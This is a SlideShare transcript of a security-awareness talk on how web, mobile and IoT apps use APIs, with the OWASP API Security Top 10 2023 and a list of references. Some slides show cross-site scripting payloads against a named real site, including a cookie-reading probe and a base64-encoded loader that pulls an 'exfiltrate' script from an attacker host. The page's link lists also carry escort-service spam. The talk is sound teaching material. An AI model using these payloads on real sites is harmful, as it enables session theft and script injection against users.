SlideShare une entreprise Scribd logo

Web Apps APIs' Nightmare Guide

Paulo Silva
Paulo Silva

The document discusses the evolution of web applications from traditional to modern architectures. It explains how traditional web apps involved separate files (HTML, CSS, JS) retrieved through individual HTTP requests, while modern apps retrieve all code in a single bundle and make additional requests to APIs. It also covers how mobile, IoT and other connected apps interact through APIs instead of web pages. Finally, it lists the OWASP API Security Top 10 risks and provides additional resources on secure API development.

Logiciels
1  sur  48
www.char49.com TRUE SECURITY Web Apps: APIs’ Nightmare
● Security Researcher/Pentester ● 15+ years as a Software Developer ● Long-term OWASP Volunteer ● Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs’ Nightmare
source: https://home.cern/science/computing/birth-web
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET / Content-Type: text/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript php index.php login.php . . . POST /login.php Content-Type: text/html
Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
Web Apps: APIs’ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
Web Apps: APIs’ Nightmare
Web Apps: APIs’ Nightmare
Web Apps: APIs’ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
Web Apps: APIs’ Nightmare Modern Web Applications Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ...
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
Web Apps: APIs’ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
API API API API API API API API API API API API API Web Apps: APIs’ Nightmare API
Web Apps: APIs’ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=alert(document.cookie)>
Web Apps: APIs’ Nightmare Loader Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))> Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare OWASP Resources Other References ● OWASP API Security Project ● OWASP API Security Top 10 2023 ● OWASP API Security Top 10 2019 ● Goats ● OWASP Vulnerable Web Applications Directory ● OWASP crAPI - Completely Ridiculous API ● OWASP Juice Shop ● OWASP Cheat Sheets Series ● Authentication Cheat Sheet ● Authorization Cheat Sheet ● GraphQL Cheat Sheet ● REST Security Cheat Sheet ● Web Service Security Cheat Sheet ● OWASP Secure Coding Practices-Quick Reference Guide ● OWASP Go Secure Coding Practices Guide ● HTTP ● Basic of HTTP - mdn web docs ● Cross-Origin Resource Sharing (CORS) - mdn web docs ● API Protocols ● REST ● Representational state transfer - Wikipedia ● Representational State Transfer (REST) - Fielding Dissertation ● RPC ● Remote procedure call - Wikipedia ● OpenRPC ● JSON-RPC ● XML-RPC ● gRPC ● GraphQL ● Introduction to GraphQL ● GraphQL blogposts Series - Checkmarx ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify ● MindAPI ● MindAPI References
Web Apps: APIs’ Nightmare OWASP Resources Other References
www.char49.com Thank You!

Recommandé

API Security - Null meet
API Security - Null meetAPI Security - Null meet
API Security - Null meetvinoth kumar
 
API Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsAPI Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsTom Johnson
 
How to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxHow to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxChanna Ly
 
Event-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivEvent-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivAmazon Web Services
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPIJie Liau
 
Events, Picos, and Microservices
Events, Picos, and MicroservicesEvents, Picos, and Microservices
Events, Picos, and MicroservicesPhil Windley
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Realtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesRealtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesAkhilesh Gupta
 

Recommandé

API Security - Null meet
API Security - Null meetAPI Security - Null meet
API Security - Null meetvinoth kumar
 
API Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsAPI Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsTom Johnson
 
How to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxHow to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxChanna Ly
 
Event-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivEvent-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivAmazon Web Services
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPIJie Liau
 
Events, Picos, and Microservices
Events, Picos, and MicroservicesEvents, Picos, and Microservices
Events, Picos, and MicroservicesPhil Windley
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Realtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesRealtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesAkhilesh Gupta
 
Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesSungwon Lee
 
Design Web Api
Design Web ApiDesign Web Api
Design Web ApiTailor Fontela
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisTeodoro Cipresso
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発LINE Corporation
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncYan Cui
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsApigee | Google Cloud
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwasN6
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 OSSCube
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014JonAbrams
 
Api Testing
Api TestingApi Testing
Api TestingVishwanath KC
 
Api Testing
Api TestingApi Testing
Api TestingVishwanath KC
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the MassesDavid Tufts
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Daniel Zivkovic
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...Kim Clark
 
API Design- Best Practices
API Design- Best PracticesAPI Design- Best Practices
API Design- Best PracticesPrakash Bhandari
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationCA | Automic Software
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveCall Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 

Contenu connexe

Similaire à Web Apps APIs' Nightmare Guide

Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesSungwon Lee
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisTeodoro Cipresso
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発LINE Corporation
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncYan Cui
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsApigee | Google Cloud
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwasN6
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 OSSCube
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014JonAbrams
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the MassesDavid Tufts
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Daniel Zivkovic
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...Kim Clark
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationCA | Automic Software
 

Similaire à Web Apps APIs' Nightmare Guide (20)

Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on Kubernetes
 
Design Web Api
Design Web ApiDesign Web Api
Design Web Api
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apis
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSync
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIs
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdf
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdf
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdf
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014
 
Api Testing
Api TestingApi Testing
Api Testing
 
Api Testing
Api TestingApi Testing
Api Testing
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the Masses
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...
 
API Design- Best Practices
API Design- Best PracticesAPI Design- Best Practices
API Design- Best Practices
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE Automation
 

Dernier

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 

Dernier (20)

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
